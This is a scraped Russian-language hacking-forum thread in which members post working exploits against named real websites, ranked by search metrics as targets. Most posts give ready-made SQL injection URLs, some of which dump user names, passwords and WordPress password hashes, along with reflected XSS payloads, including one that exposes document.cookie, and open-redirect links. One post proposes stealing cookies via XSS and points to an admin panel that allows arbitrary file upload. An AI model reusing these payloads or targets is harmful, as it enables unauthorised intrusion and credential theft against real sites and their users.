Уязвимости SQLi, XSS и другие.

Discussion in 'Песочница' started by Егорыч+++, 10 May 2015.

  1. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Redirect
    Code:
    blagoveshchensk-amur.websender.ru/redirect.php?url=http://вашсайт/
    Code:
    partop.ru/redirect.php?url=http://вашсайт/ 
    .
    Code:
    budennovsk.g-o-r-o-d.ru/url.php?url=http...
     
  2. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    XSS-Reflected
    Code:
    "><script>alert()</script>
    Сайт : _ttp://hibiny.com/
    В поисковике .


    XSS-Reflected
    Url:
    Code:
    _ttp://ntagil.rutaxi.ru/index.html?state=closedialog
    Жмём "Дополнительные параметры",ищем строку "№ корп.ка" и вводим туда свой скрипт . В моём случае
    Code:
    "><script>alert()</script>
    и скрипт сразу срабатывает . Вбивается под строкой "Дополнительные параметры" .
     
    #202 SaNDER, 25 Oct 2015
    Last edited: 25 Oct 2015
  3. Waki

    Waki Member

    Joined:
    9 Oct 2015
    Messages:
    55
    Likes Received:
    31
    Reputations:
    10
    UNION query
    Code:
    http://www.alda-europe.eu/newSite/project_dett.php?ID=ID=-8135%20UNION%20ALL%20SELECT%205511,5511,5511,5511,5511,5511,5511,5511,5511,5511,version(),5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511,5511#
    
    5.0.92-enterprise-gpl-log

    тиц 30
    pr 6
     
  4. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    XSS-Reflected .
    Сайт:_ttp://stranasp.ru
    Code:
    "><script>alert()</script>
     
  5. joelblack

    joelblack Reservists Of Antichat

    Joined:
    6 Jul 2015
    Messages:
    228
    Likes Received:
    389
    Reputations:
    105
  6. private_static

    Joined:
    19 May 2015
    Messages:
    118
    Likes Received:
    76
    Reputations:
    22
    Target:gismeteo.ru
    Type:XSS Reflected
    ТИЦ:23k
    Code:
    http://informer.gismeteo.ru/html/getinformer_new.php?tnumber=1&city0=4980Кишинев<script>alert("xss")</script>&codepg=utf-8&par=4&inflang=rus&domain=ru&vieinf=2&p=1&w=1&tblstl=gmtbl&tdttlstl=gmtdttl&tdtext=gmtdtext&new_scheme=1
     
  7. SaNDER

    SaNDER Banned

    Joined:
    9 Jul 2015
    Messages:
    213
    Likes Received:
    15
    Reputations:
    3
    Ссылка : _ttp://www.golovastik.ru .
    Тип : XSS-Reflected .
    Code:
    "><script>alert()</script>
    вводится в поисковике .
     
  8. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    VLS | Сервер деревенской жизни
    SQLi
    HTML:
    http://villagelifeserver.ru/pack.php?ID=-4%27%20union%20select%201,group_concat(ID,0x3a,UUID,0x3a,nick,0x3a,password,0x3a,sex,0x3a,status),3,4,5,6,7,8,9,10,11,12,13%20FROM%20users--+f
    ТИЦ 10
    AR 558,485
     
  9. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    grimnir likes this.
  10. Octavian

    Octavian Member

    Joined:
    8 Jul 2015
    Messages:
    478
    Likes Received:
    87
    Reputations:
    21
    #210 Octavian, 31 Dec 2015
    Last edited: 31 Dec 2015
    grimnir likes this.
  11. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.dortekarrebaek.dk/newsdetail.php?id=193+union+select+1,user(),version(),4+--
    DORTEKARREBAEK_@10.246.64.149
    5.5.47-MariaDB-1~wheezy

    Code:
    http://www.afmec.org/admin/index.php?msg=<script>alert("LOL")</script>
    Code:
    http://www.trex.uqam.ca/index.php?action=<script>alert("LOL")</script>
     
  12. R3hab

    R3hab Member

    Joined:
    17 May 2015
    Messages:
    117
    Likes Received:
    9
    Reputations:
    6
    Meghalaya Board of School Education
    SQLi
    HTML:
    http://www.mbose.in/more.php?category=home&id=2%27%20union%20select%201,group_concat(table_name),3,4%20FROM%20INFORMATION_SCHEMA.TABLES--+f
    PR 3
    AR 796,284

    5.5.36-cll
     
  13. ph03nix

    ph03nix New Member

    Joined:
    7 Jan 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  14. ph03nix

    ph03nix New Member

    Joined:
    7 Jan 2016
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
  15. blackhead

    blackhead New Member

    Joined:
    11 Aug 2015
    Messages:
    27
    Likes Received:
    1
    Reputations:
    0
    1. Target: courtnews.co.nz PR 3
    Type: SQLi

    Code:
    http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+user%28%29,version%28%29,3+--
    hooked_hooked@localhost
    5.1.73-cll
    На сайте есть блог wp, можно попробовать украсть куки через XSS
    Code:
    http://courtnews.co.nz/story.php?id=-3251+UNION+SELECT+1,0x3C7363726970743E616C657274282758585827293C2F7363726970743E,3+--

    2. Target: beloboka.ru ТИЦ 60
    Type: SQLi
    Code:
    http://beloboka.ru/beloboka/index.php?mode=sections&id=-53+UNION+SELECT+1,2,3,4,user(),version()+--

    beloboka@localhost
    5.6.19-log

    Админка http://beloboka.ru/beloboka/cp
    Пароль и логин в базе. В админке есть возможность залить любой файл.
     
    #215 blackhead, 13 Jan 2016
    Last edited: 14 Jan 2016
    simonuvarov likes this.
  16. Шниперсон

    Joined:
    14 May 2015
    Messages:
    63
    Likes Received:
    13
    Reputations:
    3
    #216 Шниперсон, 31 Jan 2016
    Last edited: 31 Jan 2016
    Mobile likes this.
  17. nordwarrior

    nordwarrior New Member

    Joined:
    12 Dec 2015
    Messages:
    13
    Likes Received:
    2
    Reputations:
    2
    SQL-i
    Code:
    http://www.northbaybiz.com/bizResources/Press_Releases/index.php?uid=999999+union+select+1,2,3,4,5,6,concat_ws(0x3a,user_email,user_pass),8,9,10,11,12,13,14,15,16,17,18,19+from+wp_users--
    
     
    tenebriss likes this.
  18. Filipp

    Filipp Member

    Joined:
    10 May 2015
    Messages:
    246
    Likes Received:
    56
    Reputations:
    31
    XSS-reflected:
    Code:
    http://blog.rebz.net/wp-includes/js//swfupload/swfupload.swf?movieName=%22]);}catch(e){}if(!self.a)self.a=!alert(document.cookie);//
    :D
     
    NetSter, HeReTiC, stepashka_ and 12 others like this.
  19. atata

    atata Active Member

    Joined:
    9 Nov 2015
    Messages:
    137
    Likes Received:
    105
    Reputations:
    1
  20. atata

    atata Active Member

    Joined:
    9 Nov 2015
    Messages:
    137
    Likes Received:
    105
    Reputations:
    1
Loading...